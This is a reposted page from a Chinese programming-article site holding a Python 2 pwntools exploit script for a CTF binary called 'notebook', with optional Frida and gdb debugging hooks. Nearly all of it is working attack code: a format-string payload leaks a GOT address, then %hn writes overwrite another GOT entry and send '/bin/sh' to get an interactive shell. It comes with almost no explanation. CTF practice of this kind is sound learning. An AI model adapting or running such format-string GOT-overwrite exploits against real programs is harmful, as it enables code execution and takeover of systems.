欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

notebook

程序员文章站 2022-05-29 08:05:54
...
    Debug=0  
    Local=1  
    Frida=0  
    Debug_pwntools=1  
     
    #常量
    Local_path='./notebook'
     
    Remote_addr=''
    Port=1
     
    frida_script_path='./frida.js'
     
     
     
    if Local!=0:
      process=process(Local_path)
    else:
      process=remote(Remote_addr,Port)
     
    if Debug_pwntools!=0:
      context.log_level="debug"
     
    if Frida!=0 and Local!=0:
      import frida,sys
     
      def print_result(message):  
                  print "[*] %s" %(message)
      
      def on_message(message, data):  
                  print_result(message['payload'])
      
      
      frida_process = frida.attach(process.pid)
      f = open('frida_script_path')
      jscode = f.read()
      f.close()
      script = frida_process.create_script(jscode)  
      script.on('message', on_message)
     
    if Debug!=0 and Local!=0:
      context.terminal = ['tmux', 'splitw', '-h']
      gdb.attach(process)
     
    if Debug!=0:
      raw_input()
    read_addr=0x0804A02C
    write_addr=0x0804A014
    globallength=0x0804A06C
    process.recv()
    process.send('a'*6+r"%25$s"+'a'*5+p32(read_addr)+p32(globallength)+r"%26$n"+"\n")
    # process.send('a'*6+r"%25$s"+'a'*5+p32(read_addr)+"\n")
     
    # process.send("1\n")
    process.recv(6)
    sys_got=u32(process.recv(4))
    # sys_got = strlen_got - (libc.got['strlen'] - libc.got['system'])
    # free_got = strlen_got - (libc.got['strlen'] - libc.got['free'])
    write_value=sys_got
    # print 'slen:'+hex(strlen_got)
    print 'sys :'+hex(write_value)
    # print 'free:'+hex(free_got)
    process.recv()
    high_value=(write_value/(2**16))
    low_value=(write_value%(2**16))
    print hex(high_value)
    print hex(low_value)
    if high_value>low_value:
      print '先写低位'
      process.send('/bin/sh'+chr(24)+p32(write_addr)+p32(write_addr+2)+r'%'+str(low_value-0x10)+r'x'+r"%23$hn"+r'%'+str(high_value-low_value)+r'x'+r"%24$hn"+"\n")
      # process.send('/bin/sh'+chr(61)+p32(write_addr)+p32(write_addr+2)+r'%'+r'x'+r"%23$hn"+r'%'+r'x'+r"%24$hn"+"\n")
     
    else:
      #先写高位
      process.send('/bin/sh'+chr(24)+p32(write_addr)+p32(write_addr+2)+r'%'+str(high_value-0x10)+r'x'+r"%24$hn"+r'%'+str(low_value-high_value)+r'x'+r"%23$hn"+"\n")
      # process.send('/bin/sh'+chr(61)+p32(write_addr)+p32(write_addr+2)+r'%'+r'x'+r"%24$hn"+r'%'+r'x'+r"%23$hn"+"\n")
     
    if Debug!=0:
      raw_input()
    process.interactive()

 

相关标签: ctf

上一篇: 前端弹窗手机版 上拉下滑加载

下一篇: “山海关之战”多尔衮是如何取胜的?为什么清军入关百姓很高兴?

推荐阅读